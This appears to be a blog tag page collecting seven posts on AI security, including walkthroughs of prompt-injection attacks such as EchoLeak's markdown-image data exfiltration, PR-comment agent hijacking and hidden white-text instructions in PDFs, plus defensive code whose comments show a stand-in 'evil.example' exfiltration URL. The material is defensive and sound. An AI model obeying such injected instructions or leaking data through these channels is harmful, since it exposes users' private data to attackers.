
7 posts tagged with "ai-security"


Output As Payload: Your AI Threat Model Got Half The Boundary

9 min read
Tian Pan
Software Engineer

The threat model your team wrote for AI features almost certainly stops at the model. Inputs are untrusted: prompt injection, jailbreaks, adversarial uploads, poisoned retrieval. Outputs are content: things to moderate for safety, score on a refusal eval, ship to the user. The shape of that threat model is roughly "untrusted thing goes in, model thinks, safe thing comes out."

The new attack class flips that polarity. The model's output is rendered, parsed, executed, or relayed by a downstream system, and an attacker who can shape that output — through indirect prompt injection in retrieval, training-data influence, or socially engineered user queries — can deliver a payload to a target the model never had direct access to. The model becomes a confused deputy with reach the attacker doesn't have, and the boundary your team is defending is two systems too early.

EchoLeak is the canonical 2025 example. A single crafted email arrives in a Microsoft 365 mailbox. Copilot ingests it as part of routine context. The hidden instructions cause Copilot to embed sensitive context into a reference-style markdown link in its response, and the client interface auto-fetches the external image — exfiltrating chat logs, OneDrive content, and Teams messages without a single user click. Microsoft's input-side classifier was bypassed because the attack didn't need to break the model's refusal calibration. It needed to shape one specific token sequence in the output.
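In sketch form, the output-side check that closes this particular channel looks something like the following Python, assuming a rendering pipeline you control and a hypothetical `TRUSTED_IMAGE_HOSTS` allowlist (the regexes cover the two markdown image forms, nothing more):

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the client is permitted to auto-fetch images from.
TRUSTED_IMAGE_HOSTS = {"res.cdn.office.net"}

# Both markdown image forms can trigger a zero-click fetch when rendered:
#   inline:     ![x](https://evil.example/img?d=SECRET)
#   reference:  ![x][r]  ...  [r]: https://evil.example/img?d=SECRET
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>https?://[^)\s]+)[^)]*\)")
REF_DEFINITION = re.compile(r"^\s*\[[^\]]+\]:\s*(?P<url>https?://\S+)", re.MULTILINE)

def sanitize_model_output(markdown: str) -> str:
    """Redact auto-fetchable image URLs on untrusted hosts before rendering."""
    def redact(m: re.Match) -> str:
        host = urlparse(m.group("url")).hostname or ""
        return m.group(0) if host in TRUSTED_IMAGE_HOSTS else "[image removed]"
    return REF_DEFINITION.sub(redact, INLINE_IMAGE.sub(redact, markdown))
```

The point of the sketch is where it sits: after the model, before the renderer. No refusal calibration in the world helps once the token sequence is already on its way to a client that auto-fetches.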

The 80-Question Wall: What Enterprise AI Security Questionnaires Actually Demand

11 min read
Tian Pan
Software Engineer

The AI feature your team shipped in March is unsellable to half your pipeline, and the engineering org doesn't know it yet. Somewhere in account-executive Slack, a deal at 80% probability just got kicked from forecast because the prospect's CISO sent over a 92-question security review with an AI addendum. Question 31 asks for your training data provenance documentation. Question 47 asks whether prompts are logged, where, for how long, and who can read them. Question 63 asks whether your inference can be region-pinned to the EU. Question 78 asks for your prompt-injection resistance rate against the OWASP LLM Top 10 corpus, with measured numbers, by model version. The deal team has 72 hours to respond. Nobody on the AI team has written down the answer to any of these.

This is the new wall. Fortune 500 procurement teams now run AI-feature-specific security reviews that didn't exist in 2023, and the answers your engineering org needs aren't hard to produce — they're just nobody's job. The questions are concrete, the frameworks are public, and yet most AI products are quietly unsellable to regulated enterprises because the answers were never written down.

The frustrating part is that none of this is mysterious. The questionnaires are templated. The expected answers are documented. The real failure mode is that AI features were shipped on the assumption that the existing SOC 2 report would carry the same enterprise-deal weight it carried for the last decade — and it doesn't.

The Coding Agent Autonomy Curve: Reading Is Free, Merging Is Incident-Class

11 min read
Tian Pan
Software Engineer

The discourse on coding agents keeps collapsing to a binary: autonomous or supervised, YOLO mode or hand-on-the-wheel, --dangerously-skip-permissions or "approve every keystroke." That framing is a category error. A coding agent does not perform "an action." It performs a sequence of actions whose costs span at least seven orders of magnitude — from reading a file (free, undoable, no side effect) to merging to main (irreversible without a revert PR) to rolling out a binary to a fleet (six-figure incident-class). Treating that range with one autonomy switch is like setting a single speed limit for both a parking lot and a freeway.

The team that ships "the agent can do everything" without mapping each action to its blast radius is one prompt-injection-bearing GitHub comment away from a postmortem — and we already have public examples of that exact failure mode. Anthropic's Claude Code Security Review, Google's Gemini CLI Action, and GitHub Copilot Agent were all confirmed in 2026 to be hijackable through specially crafted PR titles and issue bodies, in an attack pattern the researchers named "Comment and Control." The agents weren't broken in some abstract sense. They executed a high-tier action — pushing code, opening a PR — on the basis of a low-trust input the autonomy tier had silently flattened into "all the same."

What follows is the discipline that has to land: a per-action curve, gates that scale with the tier, rollback velocity matched to blast class, and an eval program that tests for tool-composition escalation rather than single-action failure.
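As a rough sketch (the tool names and tier boundaries here are illustrative, not any vendor's API), the per-action gate looks like this:

```python
from enum import IntEnum

class Tier(IntEnum):
    READ = 0          # read a file, list a dir: free, no side effect
    LOCAL = 1         # edit the working tree, run tests: undoable locally
    SHARED = 2        # push a branch, open a PR: visible to others, revertible
    IRREVERSIBLE = 3  # merge to main, deploy, delete data: incident-class

# Hypothetical mapping from tool name to tier; a real agent has many more tools.
ACTION_TIERS = {
    "read_file": Tier.READ,
    "edit_file": Tier.LOCAL,
    "run_tests": Tier.LOCAL,
    "git_push": Tier.SHARED,
    "open_pr": Tier.SHARED,
    "merge_pr": Tier.IRREVERSIBLE,
    "deploy": Tier.IRREVERSIBLE,
}

def gate(action: str, *, max_autonomous_tier: Tier, input_is_low_trust: bool) -> str:
    """Decide per action, not per session. Low-trust inputs (issue bodies,
    PR comments) cap the ceiling at READ regardless of the configured tier."""
    tier = ACTION_TIERS.get(action, Tier.IRREVERSIBLE)  # unknown tools fail closed
    ceiling = Tier.READ if input_is_low_trust else max_autonomous_tier
    return "allow" if tier <= ceiling else "require_human_approval"
```

The design choice that matters is the last two lines: trust level of the input and blast radius of the action are both inputs to the decision, which is exactly what a single session-wide autonomy switch throws away.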

Per-Tenant Inference Isolation: When Shared Cache, Fine-Tunes, and Embeddings Leak Across Customers

12 min read
Tian Pan
Software Engineer

Multi-tenant SaaS solved data isolation a decade ago. Row-level security in Postgres, per-tenant encryption keys, S3 bucket policies scoped to tenant prefixes — by 2018 the playbook was so well-rehearsed that an auditor asking "show me how customer A's data cannot reach customer B" had a one-page answer with a citation per layer. AI features quietly reintroduced the question, and the answer is no longer one page.

The interesting part is not that AI broke isolation. The interesting part is where it broke isolation: not at the data layer the audit team has been guarding for ten years, but at four new layers nobody put on the diagram. Prompt cache prefixes share KV state across requests in ways that turn time-to-first-token into a side channel. Fine-tunes trained on aggregated customer data memorize tenant-specific phrasing and surface it back to the wrong customer. Embedding indexes get partitioned logically by query filter when the threat model demands physical separation. KV-cache reuse across requests creates timing channels that nobody threat-modeled when "shared inference is fine" was a reasonable shortcut.
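To make the first two of those layers concrete, a minimal sketch of per-tenant keying, assuming shared state addressed by string keys (the helper names are illustrative):

```python
import hashlib

def cache_key(tenant_id: str, prompt_prefix: str) -> str:
    """Salt the prompt-cache key with the tenant ID so two tenants sending an
    identical prefix can never share KV state — and time-to-first-token stops
    being an oracle for 'someone else already asked this.'"""
    return hashlib.sha256(f"{tenant_id}:{prompt_prefix}".encode()).hexdigest()

def embedding_index_name(tenant_id: str) -> str:
    """Physical separation: one index per tenant, not one shared index with a
    `WHERE tenant_id = ?` filter bolted onto every query."""
    return f"embeddings-{tenant_id}"
```

Neither helper is clever; that is the point. The hard part is noticing that the shared cache and the shared index needed tenant-scoped keys at all.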

This post is about what changed and what the discipline looks like once you take the problem seriously.

Tool Outputs Are an Untrusted Channel Your Agent Treats as Trusted

11 min read
Tian Pan
Software Engineer

The threat model most teams ship their agents with has one quiet assumption buried inside: when the model calls a tool, whatever comes back is safe to read. The user's prompt is the adversary, goes the story, and tool outputs are "just data" — search results, inbox summaries, database rows, RAG chunks, file contents, page scrapes. That story is the entire reason prompt injection keeps landing in production. Tool outputs are not data. They are another input channel into the planner, with the same privilege as the user prompt and none of the suspicion.

If that framing sounds abstract, consider what happened inside Microsoft 365 Copilot in June 2025. A researcher sent a single email with hidden instructions; the victim never clicked a link, never opened an attachment, never read the message themselves. A routine "summarize my inbox" query asked Copilot to read the email. The agent dutifully followed the instructions it found inside the body, reached into OneDrive, SharePoint, and Teams, and exfiltrated organizational data through a trusted Microsoft domain before anyone noticed. The CVE (2025-32711, "EchoLeak") earned a 9.3 CVSS and a server-side patch, but the class of bug did not go away. It cannot go away, because every read-tool on every production agent is a version of that email inbox.

This post is about the framing shift that gets you unstuck: stop thinking about "prompt injection" as a user-input problem, and start thinking about every tool output as an untrusted channel that happens to share a token stream with your system prompt.
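A minimal sketch of that shift, assuming a message-passing agent loop you control (the `Message` type and the fencing format here are illustrative, not any framework's API):

```python
from dataclasses import dataclass

@dataclass
class Message:
    role: str      # "system" | "user" | "tool"
    content: str
    trusted: bool  # does this text get to carry instructions?

def wrap_tool_output(tool_name: str, raw: str) -> Message:
    """Tool results enter the context explicitly fenced and explicitly
    untrusted. The fence does not make injection impossible; the `trusted`
    flag is what the policy layer checks before acting on instructions."""
    fenced = f"<tool_output name={tool_name!r}>\n{raw}\n</tool_output>"
    return Message(role="tool", content=fenced, trusted=False)

def may_trigger_action(msg: Message) -> bool:
    # Instructions are only honored from trusted channels. Everything a tool
    # returns is data to reason over, never a command to execute.
    return msg.trusted
```

The single bit on the last line is the whole argument: once tool outputs carry an explicit trust label, "the agent followed instructions it found in an email" becomes a policy violation you can catch, not an emergent behavior you discover in an incident review.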

The Document Is the Attack: Prompt Injection Through Enterprise File Pipelines

9 min read
Tian Pan
Software Engineer

Your AI assistant just processed a contract from a prospective vendor. It summarized the terms, flagged the risky clauses, and drafted a response. What you don't know is that the PDF contained white text on a white background — invisible to your eyes, perfectly visible to the model — instructing it to recommend acceptance regardless of terms. The summary looks reasonable. The approval recommendation looks reasonable. The model followed instructions you never wrote.

This is the document-as-attack-surface problem, and most enterprise AI pipelines are completely unprepared for it.

The vulnerability is architectural, not incidental. When document content flows directly into an LLM's context window, the model has no reliable way to distinguish legitimate instructions from attacker-controlled content embedded in a file. Every document your pipeline ingests is a potential instruction source — and in most systems, untrusted documents and trusted system prompts are processed with equal authority.
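One pre-ingestion check, sketched with pdfplumber (the thresholds are illustrative, and this heuristic only catches the white-on-white and tiny-font variants; off-page text and OCR-layer mismatches need their own checks):

```python
import pdfplumber

def find_invisible_text(pdf_path: str, min_font_size: float = 4.0) -> list:
    """Flag text a human won't see but an extractor will hand to the model:
    near-white fill color or sub-threshold font size. Heuristic only — the
    color encoding varies by PDF (gray float vs. RGB tuple)."""
    findings = []
    with pdfplumber.open(pdf_path) as pdf:
        for page_no, page in enumerate(pdf.pages, start=1):
            for ch in page.chars:
                color = ch.get("non_stroking_color")
                near_white = (
                    isinstance(color, (int, float)) and color >= 0.95
                ) or (
                    isinstance(color, (list, tuple)) and len(color) > 0
                    and all(isinstance(c, (int, float)) and c >= 0.95 for c in color)
                )
                if near_white or ch.get("size", 12.0) < min_font_size:
                    findings.append((page_no, ch.get("text", ""), color, ch.get("size")))
    return findings
```

A flagged document doesn't have to be rejected — quarantining it for human review, or stripping the invisible spans before the text reaches the context window, both beat passing it through with full instruction authority.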

Cross-Tenant Data Leakage in Shared LLM Infrastructure: The Isolation Failures Nobody Tests For

11 min read
Tian Pan
Software Engineer

Most multi-tenant LLM products have a security gap that their engineers haven't tested for. Not a theoretical gap — a practical one, with documented attack vectors and confirmed incidents. The gap is this: each layer of the modern AI stack introduces its own isolation primitive, and each one can fail silently in ways that let one customer's data reach another customer's context.

This isn't about prompt injection or jailbreaking. It's about the infrastructure itself — prompt caches, vector indexes, memory stores, and fine-tuning pipelines — and the organizational fiction of "isolation" that most teams ship without validating.
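A sketch of the test that turns the fiction into a checkable claim — plant a unique canary as one tenant, then probe every shared layer as another. The `stack` fixture and its client methods are hypothetical stand-ins for whatever your infrastructure exposes; the pattern is what matters:

```python
import uuid

def test_no_cross_tenant_leakage(stack):
    # A secret that cannot exist anywhere else in the system.
    canary = f"CANARY-{uuid.uuid4().hex}"

    # Plant it as tenant A, through every write path an attacker could target.
    a = stack.as_tenant("tenant-a")
    a.ingest_document(f"internal note: {canary}")
    a.chat(f"Remember this for later: {canary}")

    # Probe every shared layer as tenant B.
    b = stack.as_tenant("tenant-b")
    assert canary not in b.retrieve("internal note")         # vector index
    assert canary not in b.chat("What do you remember?")     # memory store
    assert canary not in b.chat(f"Complete: {canary[:12]}")  # cache / fine-tune
```

Run it in CI, per release, against the real stack. An isolation claim that has never been probed this way is exactly the organizational fiction the post is about.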